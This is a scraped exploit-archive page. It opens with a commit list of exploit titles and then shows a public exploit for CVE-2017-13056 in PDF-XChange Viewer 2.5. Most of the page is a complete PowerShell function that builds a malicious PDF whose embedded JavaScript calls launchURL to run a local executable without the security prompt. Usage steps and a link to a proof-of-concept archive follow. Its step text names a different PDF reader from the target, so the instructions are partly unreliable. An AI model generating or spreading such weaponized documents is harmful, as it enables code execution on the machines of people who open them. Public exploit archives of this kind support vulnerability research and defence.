ed0e1e4d44
1979 changes to exploits/shellcodes Couchdb 1.5.0 - 'uuids' Denial of Service Apache CouchDB 1.5.0 - 'uuids' Denial of Service Beyond Remote 2.2.5.3 - Denial of Service (PoC) udisks2 2.8.0 - Denial of Service (PoC) Termite 3.4 - Denial of Service (PoC) SoftX FTP Client 3.3 - Denial of Service (PoC) Silverstripe 2.3.5 - Cross-Site Request Forgery / Open redirection SilverStripe CMS 2.3.5 - Cross-Site Request Forgery / Open Redirection Silverstripe CMS 3.0.2 - Multiple Vulnerabilities SilverStripe CMS 3.0.2 - Multiple Vulnerabilities Silverstripe CMS 2.4 - File Renaming Security Bypass SilverStripe CMS 2.4 - File Renaming Security Bypass Silverstripe CMS 2.4.5 - Multiple Cross-Site Scripting Vulnerabilities SilverStripe CMS 2.4.5 - Multiple Cross-Site Scripting Vulnerabilities Silverstripe CMS 2.4.7 - 'install.php' PHP Code Injection SilverStripe CMS 2.4.7 - 'install.php' PHP Code Injection Silverstripe Pixlr Image Editor - 'upload.php' Arbitrary File Upload SilverStripe CMS Pixlr Image Editor - 'upload.php' Arbitrary File Upload Silverstripe CMS 2.4.x - 'BackURL' Open Redirection SilverStripe CMS 2.4.x - 'BackURL' Open Redirection Silverstripe CMS - 'MemberLoginForm.php' Information Disclosure SilverStripe CMS - 'MemberLoginForm.php' Information Disclosure Silverstripe CMS - Multiple HTML Injection Vulnerabilities SilverStripe CMS - Multiple HTML Injection Vulnerabilities Apache CouchDB 1.7.0 and 2.x before 2.1.1 - Remote Privilege Escalation Apache CouchDB 1.7.0 / 2.x < 2.1.1 - Remote Privilege Escalation Monstra CMS before 3.0.4 - Cross-Site Scripting Monstra CMS < 3.0.4 - Cross-Site Scripting (2) Monstra CMS < 3.0.4 - Cross-Site Scripting Monstra CMS < 3.0.4 - Cross-Site Scripting (1) Navigate CMS 2.8 - Cross-Site Scripting Collectric CMU 1.0 - 'lang' SQL injection Joomla! Component CW Article Attachments 1.0.6 - 'id' SQL Injection LG SuperSign EZ CMS 2.5 - Remote Code Execution MyBB Visual Editor 1.8.18 - Cross-Site Scripting Joomla! Component AMGallery 1.2.3 - 'filter_category_id' SQL Injection Joomla! Component Micro Deal Factory 2.4.0 - 'id' SQL Injection RICOH Aficio MP 301 Printer - Cross-Site Scripting Joomla! Component Auction Factory 4.5.5 - 'filter_order' SQL Injection RICOH MP C6003 Printer - Cross-Site Scripting Linux/ARM - Egghunter (PWN!) + execve(_/bin/sh__ NULL_ NULL) Shellcode (28 Bytes) Linux/ARM - sigaction() Based Egghunter (PWN!) + execve(_/bin/sh__ NULL_ NULL) Shellcode (52 Bytes)
81 lines
No EOL
2.7 KiB
Text
81 lines
No EOL
2.7 KiB
Text
# Exploit Title: PDF-XChange Viewer 2.5 (Build 314.0) Javascript API Remote Code Execution Exploit (Powershell PDF Exploit Creation)
|
|
# Date: 21-08-2017
|
|
# Software Link 32bit: http://pdf-xchange-viewer.it.uptodown.com/windows
|
|
# Exploit Author: Daniele Votta
|
|
# Contact: vottadaniele@gmail.com
|
|
# Website: https://www.linkedin.com/in/vottadaniele/
|
|
# CVE: 2017-13056
|
|
|
|
# Category: PDF Reader RCE
|
|
|
|
1. Description
|
|
|
|
This module exploits an unsafe Javascript API implemented in PDF-XChange Viewer.
|
|
The launchURL() function allows an attacker to execute local files on the file
|
|
system and bypass the security dialog.
|
|
|
|
2. Proof of Concept (Generate evil PDF that start calc.exe)
|
|
Step 1: Customize New-PDFjs.ps1 (custom params + PdfSharp-WPF.dll path)
|
|
Step 2: Execute Windows PowerShell: PS C:\Users\User> New-PDFJS
|
|
Step 3: Open the generated PDF with Nitro Pro PDF Reader
|
|
|
|
3. PDF Generation:
|
|
|
|
function New-PDFJS {
|
|
|
|
|
|
|
|
# Use the desidered params
|
|
|
|
[CmdletBinding()]
|
|
|
|
Param (
|
|
|
|
[string]$js ="app.launchURL('C:\\Windows\\System32\\calc.exe')",
|
|
|
|
[string]$msg = "Hello PDF",
|
|
|
|
[string]$filename = "C:\Users\User\Desktop\calc.pdf"
|
|
|
|
)
|
|
|
|
|
|
|
|
# Use the PDFSharp-WPF.dll library path
|
|
|
|
Add-Type -Path C:\Users\Daniele\Desktop\PdfSharp-WPF.dll
|
|
|
|
$doc = New-Object PdfSharp.Pdf.PdfDocument
|
|
$doc.Info.Title = $msg
|
|
$doc.info.Creator = "AnonymousUser"
|
|
$page = $doc.AddPage()
|
|
|
|
$graphic = [PdfSharp.Drawing.XGraphics]::FromPdfPage($page)
|
|
$font = New-Object PdfSharp.Drawing.XFont("Courier New", 20, [PdfSharp.Drawing.XFontStyle]::Bold)
|
|
$box = New-Object PdfSharp.Drawing.XRect(0,0,$page.Width, 100)
|
|
$graphic.DrawString($msg, $font, [PdfSharp.Drawing.XBrushes]::Black, $box, [PdfSharp.Drawing.XStringFormats]::Center)
|
|
|
|
$dictjs = New-Object PdfSharp.Pdf.PdfDictionary
|
|
$dictjs.Elements["/S"] = New-Object PdfSharp.Pdf.PdfName ("/JavaScript")
|
|
$dictjs.Elements["/JS"] = New-Object PdfSharp.Pdf.PdfStringObject($doc, $js);
|
|
|
|
$doc.Internals.AddObject($dictjs)
|
|
|
|
$dict = New-Object PdfSharp.Pdf.PdfDictionary
|
|
$pdfarray = New-Object PdfSharp.Pdf.PdfArray
|
|
$embeddedstring = New-Object PdfSharp.Pdf.PdfString("EmbeddedJS")
|
|
|
|
$dict.Elements["/Names"] = $pdfarray
|
|
$pdfarray.Elements.Add($embeddedstring)
|
|
$pdfarray.Elements.Add($dictjs.Reference)
|
|
$doc.Internals.AddObject($dict)
|
|
|
|
$dictgroup = New-Object PdfSharp.Pdf.PdfDictionary
|
|
$dictgroup.Elements["/JavaScript"] = $dict.Reference
|
|
$doc.Internals.Catalog.Elements["/Names"] = $dictgroup
|
|
|
|
$doc.Save($filename)
|
|
}
|
|
|
|
Proof of Concept:
|
|
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42537.zip |